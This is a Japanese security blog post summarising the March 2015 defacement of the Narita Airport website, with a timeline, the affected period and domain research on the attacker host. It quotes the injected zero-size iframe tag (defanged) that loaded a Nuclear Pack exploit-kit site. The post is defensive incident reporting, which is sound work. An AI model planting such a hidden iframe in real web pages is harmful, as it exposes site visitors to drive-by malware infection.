ブログトップ 記事一覧 ログイン 無料ブログ開設

piyolog RSSフィード

2015-03-05

2015年3月の成田空港ウェブサイト改ざんをまとめてみた。

| 06:45 |  2015年3月の成田空港ウェブサイト改ざんをまとめてみた。を含むブックマーク

2015年3月5日、成田国際空港は同社サイト、及び同社が管理する成田空港ウェブサイト改ざんされ、改ざん期間中閲覧した際はマルウェア感染する可能性があったことを発表しました。ここではその関連情報をまとめます。

成田空港ウェブサイト改ざん概要

図にまとめると次の通り。

f:id:Kango:20150306062147p:image:w640

この図は次のつぶやき、リンクを参考にしています。

公式発表

タイムライン

日付出来事
2015年3月3日0時20分成田空港ウェブサイト改ざんされる
成田国際空港社内PCでマルウェアの検出報告が相次ぐ
2015年3月4日16時30分頃成田空港改ざんの事態を把握。*1
2015年3月5日 1時成田空港ウェブサイトを一時閉鎖。暫定サイトに切り替え。
〃17時37分成田空港ウェブサイトを復旧。
成田国際空港ウェブサイト改ざんについて発表。

被害概要

改ざん期間中に以下のURLにアクセスするとマルウェア感染する可能性があった。

成田空港のフライト状況の案内ページへの改ざんは行われていない。

改ざんされていた期間

成田国際空港の発表によれば次の期間に改ざんされたページが表示されていた。

  • 2015年3月3日 0時20分 〜 3月5日 1時0分

2月以前も改ざんされていたと指摘する情報がある。

改ざん以外の被害について

発端

原因

対応

改ざんの内容詳細

複数のページに次のiframeタグが挿入され、当該ページを閲覧した際に外部のサイトへ接続する状態となっていた。

注意:この外部サイトは2015年3月6日現在も稼働中のためアクセスしないで下さい。

<iframe src="hxxp://acds.pw/" frameBorder=0 width=0 scrolling=no height=0></iframe>

https://malwr.com/analysis/YjczZmI5NzUwMmRiNDFlZmIzNDE4OWY2YTRmN2RhMTI/
Nuclear Pack Exploitkitの悪用する脆弱性

Nuclear Packの悪用する脆弱性は次が確認されている。

f:id:Kango:20150306062143p:image:w500

読込先に指定されていた外部サイトの謎

タイトルタグに「ニコッとタウン 絵本のような仮想生活コミュニティ」と記載されている。これはスクウェアエニックス社のコミュニケーションサービスと同名のもので、当該ドメインが差すIPアドレスを使用する別ドメインで「nicotto.pw」が存在する。

aguse.jp (acds.pw)

f:id:Kango:20150306062144p:image

f:id:Kango:20150306062146p:image

DomainTools (nicotto.pw)

f:id:Kango:20150306062145p:image

更新履歴

  • 2015年3月6日 AM 新規作成
  • 2015年3月6日 AM 情報追加・一部加筆・注意書き追加